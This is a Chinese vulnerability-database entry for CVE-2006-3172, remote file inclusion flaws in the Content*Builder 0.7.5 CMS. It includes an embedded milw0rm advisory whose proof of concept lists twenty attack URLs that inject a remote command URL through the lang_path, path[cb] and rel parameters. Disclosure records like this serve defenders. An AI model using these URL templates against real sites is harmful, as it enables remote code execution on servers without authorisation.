CVE-2006-3172
CVSS7.5
发布时间 :2006-06-22 20:02:00
修订时间 :2016-12-06 21:59:13
NMCOE    

[原文]Multiple PHP remote file inclusion vulnerabilities in Content*Builder 0.7.5 allow remote attackers to execute arbitrary PHP code via a URL with a trailing slash (/) character in the (1) lang_path parameter to (a) cms/plugins/col_man/column.inc.php, (b) cms/plugins/poll/poll.inc.php, (c) cms/plugins/user_managment/usrPortrait.inc.php, (d) cms/plugins/user_managment/user.inc.php, (e) cms/plugins/media_manager/media.inc.php, (f) cms/plugins/events/permanent.eventMonth.inc.php, (g) cms/plugins/events/events.inc.php, and (h) cms/plugins/newsletter2/newsletter.inc.php; (2) path[cb] parameter to (i) modules/guestbook/guestbook.inc.php, (j) modules/shoutbox/shoutBox.php, and (k) modules/sitemap/sitemap.inc.php; and the (3) rel parameter to (l) modules/download/overview.inc.php, (m) modules/download/detailView.inc.php, (n) modules/article/fullarticle.inc.php, (o) modules/article/comments.inc.php, (p) modules/article2/overview.inc.php, (q) modules/article2/fullarticle.inc.php, (r) modules/article2/comments.inc.php, (s) modules/headline/headlineBox.php, and (t) modules/headline/showHeadline.inc.php.


[CNNVD]Content-Builder 多个远程文件包含漏洞(CNNVD-200606-405)

        Content*Builder 0.7.5存在多个PHP远程文件包含漏洞。远程攻击者可以借助(1) 对(a) cms/plugins/col_man/column.inc.php, (b) cms/plugins/poll/poll.inc.php, (c) cms/plugins/user_managment/usrPortrait.inc.php, (d) cms/plugins/user_managment/user.inc.php, (e) cms/plugins/media_manager/media.inc.php, (f) cms/plugins/events/permanent.eventMonth.inc.php, (g) cms/plugins/events/events.inc.php和(h) cms/plugins/newsletter2/newsletter.inc.php的lang_path参数; (2)对 (i) modules/guestbook/guestbook.inc.php, (j) modules/shoutbox/shoutBox.php和(k) modules/sitemap/sitemap.inc.php的 path[cb]参数; 以及(3)对(l) modules/download/overview.inc.php, (m) modules/download/detailView.inc.php, (n) modules/article/fullarticle.inc.php, (o) modules/article/comments.inc.php, (p) modules/article2/overview.inc.php, (q) modules/article2/fullarticle.inc.php, (r) modules/article2/comments.inc.php, (s) modules/headline/headlineBox.php和(t) modules/headline/showHeadline.inc.php的 rel参数中带有尾随的斜线 (/) 字符的URL,执行任意PHP代码。

- CVSS (基础分值)

CVSS分值: 7.5 [严重(HIGH)]
机密性影响: [--]
完整性影响: [--]
可用性影响: [--]
攻击复杂度: [--]
攻击向量: [--]
身份认证: [--]

- CWE (弱点类目)

CWE-94 [对生成代码的控制不恰当(代码注入)]

- CPE (受影响的平台与产品)

产品及版本信息(CPE)暂不可用

- OVAL (用于检测的技术细节)

未找到相关OVAL定义

- 官方数据库链接

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-3172
(官方数据源) MITRE
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2006-3172
(官方数据源) NVD
http://www.cnnvd.org.cn/vulnerability/show/cv_cnnvdid/CNNVD-200606-405
(官方数据源) CNNVD

- 其它链接及资源

http://marc.info/?l=bugtraq&m=115016951316696&w=2
(UNKNOWN)  BUGTRAQ  20060611 Content-Builder (CMS) 0.7.5, Remote command execution
http://www.securityfocus.com/bid/18404
(UNKNOWN)  BID  18404
http://www.vupen.com/english/advisories/2006/2300
(VENDOR_ADVISORY)  VUPEN  ADV-2006-2300
http://xforce.iss.net/xforce/xfdb/27044
(UNKNOWN)  XF  contentbuilder-multiple-file-include(27044)

- 漏洞信息

Content-Builder 多个远程文件包含漏洞
高危 输入验证
2006-06-22 00:00:00 2006-06-27 00:00:00
远程  
        Content*Builder 0.7.5存在多个PHP远程文件包含漏洞。远程攻击者可以借助(1) 对(a) cms/plugins/col_man/column.inc.php, (b) cms/plugins/poll/poll.inc.php, (c) cms/plugins/user_managment/usrPortrait.inc.php, (d) cms/plugins/user_managment/user.inc.php, (e) cms/plugins/media_manager/media.inc.php, (f) cms/plugins/events/permanent.eventMonth.inc.php, (g) cms/plugins/events/events.inc.php和(h) cms/plugins/newsletter2/newsletter.inc.php的lang_path参数; (2)对 (i) modules/guestbook/guestbook.inc.php, (j) modules/shoutbox/shoutBox.php和(k) modules/sitemap/sitemap.inc.php的 path[cb]参数; 以及(3)对(l) modules/download/overview.inc.php, (m) modules/download/detailView.inc.php, (n) modules/article/fullarticle.inc.php, (o) modules/article/comments.inc.php, (p) modules/article2/overview.inc.php, (q) modules/article2/fullarticle.inc.php, (r) modules/article2/comments.inc.php, (s) modules/headline/headlineBox.php和(t) modules/headline/showHeadline.inc.php的 rel参数中带有尾随的斜线 (/) 字符的URL,执行任意PHP代码。

- 公告与补丁

        暂无数据

- 漏洞信息 (1903)

Content-Builder (CMS) 0.7.5 Multiple Include Vulnerabilities (EDBID:1903)
php webapps
2006-06-11 Verified
0 Federico Fazzi
N/A [点击下载]
-----------------------------------------------------
Advisory id: FSA:012

Author:    Federico Fazzi
Date:      11/06/2006, 22:30
Sinthesis: Content-Builder (CMS) 0.7.5, Remote command execution
Type:      high
Product:   http://www.content-builder.de/
Patch:     unavailable
-----------------------------------------------------


1) Description:

vulnerables page:

Multiple vulnerabilities, see poc.

2) Proof of concept:

http://example/[cb_path]/cms/plugins/col_man/column.inc.php?lang_path=[cmd_url]/
http://example/[cb_path]/cms/plugins/poll/poll.inc.php?lang_path=[cmd_url]/
http://example/[cb_path]/cms/plugins/user_managment/usrPortrait.inc.php?lang_path=[cmd_url]/
http://example/[cb_path]/cms/plugins/user_managment/user.inc.php?lang_path=[cmd_url]/
http://example/[cb_path]/cms/plugins/media_manager/media.inc.php?lang_path=[cmd_url]/
http://example/[cb_path]/cms/plugins/events/permanent.eventMonth.inc.php?lang_path=[cmd_url]/
http://example/[cb_path]/cms/plugins/events/events.inc.php?lang_path=[cmd_url]/
http://example/[cb_path]/cms/plugins/newsletter2/newsletter.inc.php?lang_path=[cmd_url]/
http://example/[cb_path]/modules/guestbook/guestbook.inc.php?path[cb]=[cmd_url]/
http://example/[cb_path]/modules/shoutbox/shoutBox.php?path[cb]=[cmd_url]/
http://example/[cb_path]/modules/download/overview.inc.php?rel=[cmd_url]/
http://example/[cb_path]/modules/download/detailView.inc.php?rel=[cmd_url]/
http://example/[cb_path]/modules/sitemap/sitemap.inc.php?path[cb]=[cmd_url]/
http://example/[cb_path]/modules/article/fullarticle.inc.php?rel=[cmd_url]/
http://example/[cb_path]/modules/article/comments.inc.php?rel=[cmd_url]/
http://example/[cb_path]/modules/article2/overview.inc.php?rel=[cmd_url]/
http://example/[cb_path]/modules/article2/fullarticle.inc.php?rel=[cmd_url]/
http://example/[cb_path]/modules/article2/comments.inc.php?rel=[cmd_url]/
http://example/[cb_path]/modules/headline/headlineBox.php?rel=[cmd_url]/
http://example/[cb_path]/modules/headline/showHeadline.inc.php?rel=[cmd_url]/

(note: add a cmd url with final slash (/))

3) Solution:

sanitized all variables on all files.

# milw0rm.com [2006-06-11]
		

- 漏洞信息

26344
Content*Builder col_man/column.inc.php lang_path Parameter Remote File Inclusion
Remote / Network Access Input Manipulation
Loss of Integrity
Exploit Public

- 漏洞描述

Content*Builder contains a flaw that may allow a remote attacker to execute arbitrary commands. The issue is due to the /cms/plugins/col_man/column.inc.php script not properly sanitizing user input supplied to the 'lang_path' variable. This may allow an attacker to include a file from a remote host that contains arbitrary commands which will be executed by the vulnerable script.

- 时间线

2006-06-11 Unknow
2006-06-11 Unknow

- 解决方案

Currently, there are no known upgrades, patches, or workarounds available to correct this issue.

- 相关参考

- 漏洞作者

 

 

关于SCAP中文社区

SCAP中文社区是国内第一个以SCAP为主题的中文开放社区。了解更多信息,请查阅[关于本站]

版权声明

CVE/CWE/OVAL均为MITRE公司的注册商标,它们的官方数据源均保存在MITRE公司的相关网站